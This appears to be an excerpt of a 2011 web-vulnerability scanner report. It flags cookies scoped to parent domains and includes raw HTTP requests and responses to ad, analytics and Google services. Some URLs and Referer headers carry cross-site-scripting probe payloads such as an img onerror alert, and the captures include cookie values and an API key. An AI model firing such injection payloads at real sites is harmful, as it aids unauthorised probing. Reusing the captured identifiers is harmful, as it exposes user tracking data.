Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:36:02 GMT
Content-Length: 5976
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:35:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:35:59 GMT
Content-Length: 4758
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clickaider.js HTTP/1.1
Host: hit.clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=4d3f2276-241363738113; clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; vid=3e136b53-42127475201;
Response
HTTP/1.1 200 OK
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Expires: Fri, 04 Feb 2011 20:32:22 GMT
Cache-Control: private, max-age=86400
Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
Content-Type: application/x-javascript
Content-Length: 9501
Date: Thu, 03 Feb 2011 20:32:22 GMT
Server: lighttpd/1.4.18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pv?lng=156&&lnks=&t=Boardreader%20-%20Forum%20Search%20Engine&c=9f671068-5&r=&tz=-360&var1=main%20page&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2F&rnd=5831 HTTP/1.1
Host: hit.clickaider.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=3e136b53-42127475201
Response
HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; path=/; domain=.clickaider.com
Set-Cookie: sid=4d3f2276-241363738113; path=/; domain=.clickaider.com
Cache-Control: no-cache, private, proxy-revalidate, max-age=86400
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Thu, 03 Feb 2011 19:52:09 GMT
Server: lighttpd/1.4.18
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAACH56svoxGh0pQKQS_SWJUw.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=1x_JRAnhVh0aezZvVbButQc6VLCkeQ4CCDimZx9OaQ=6FvUugeFs7hoYGaI; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAADYWfsu5HsvuyGjqK9465xg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Abc+Development
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAAIVT7-vGYB4446LYcy48YVM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=MInFyyM8yCTUzGr8cP7TNrs0RJ5g93nqipFbcotH9w=SFQpwHyDfkoyN23H; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/log/log.png?a=logitemaction&CbC=1&CbF=true&EC=3&RC=3&SmC=2&AmN=1&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RvN=1&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=0&VgI=26d91cdf5493d1dd943311e83ddb679d&SfF=true&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1 HTTP/1.1
Host: l0.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT
Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Length: 11752
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT
Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 20:32:21 GMT
Content-Length: 101191
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /load/?p=200&g=512 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g
Response
HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Date: Thu, 03 Feb 2011 20:52:27 GMT
Server: HTTP server
Content-Length: 92
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296787023%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A0%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296787023670%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296787013038%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A1487308896.1296787013%2Cga_sid%3A1296787013%2Cga_hid%3A720933573%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A0%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A0%2Cu_nmime%3A0%2Cbiw%3A1172%2Cbih%3A684%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.google.com
Proxy-Connection: Keep-Alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/vp?spn=0.009576,0.017166&z=15&key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw&sensor=false&mapclient=jsapi&vp=41.946689,-87.722974 HTTP/1.1
Accept: */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.google.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=uLb5N4IWzq69fpvU9NRMdRwqyZ6X0vlV4_5pv5CdNKeZzHIttIFsFFROwKvZ8yBA8mb0TbBcsP-oWgtp_QlmRTuRgp76nFXFc891WpJptaOSbHtr3dRtyEUGLvYLghHC;Domain=.google.com;Path=/;Expires=Fri, 05-Aug-2011 20:33:46 GMT;HttpOnly
Date: Thu, 03 Feb 2011 20:33:46 GMT
Expires: Thu, 03 Feb 2011 20:33:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8"> <meta http-equiv="Content-Type" content="text/h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lh/view?hl\x3den\x26tab\x3dwq\x22 HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Expires: Thu, 03 Feb 2011 20:32:50 GMT
Date: Thu, 03 Feb 2011 20:32:50 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=mCwhgibP1AJo; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=YPoXsbXHf620OMz2tliwug; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close
<html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"></meta> <title>404 NOT_FOUND</title> <style><!-- body {font-family: arial,sans-serif} div.nav {margin-top: 1ex} div.nav A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EDIAJKANq0itiBCpnizJGquYH6TbIAHAAQH7BYGWAJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ
If-None-Match: "J18332:E0-293462370-1296766279068"
Response
HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EBUAJKANq0itiBCpnizJGquYH6TbIAHAAQH8BYG2AJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ; expires=Thu, 05-May-2011 02:23:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "J18338:E0-293462370-1296766279068"
Cache-Control: private, no-transform, max-age=600
Expires: Fri, 04 Feb 2011 02:33:00 GMT
Content-Length: 159
Date: Fri, 04 Feb 2011 02:23:00 GMT
Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/smart-devil/19/697/322/x22 HTTP/1.1
Host: qa.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/
Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT
If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:33:42 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://scholar.google.com/schhp? ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search HTTP/1.1
Host: shopping.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:33:43 GMT
Set-Cookie: B=fcqcce56km497&b=3&s=rv; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
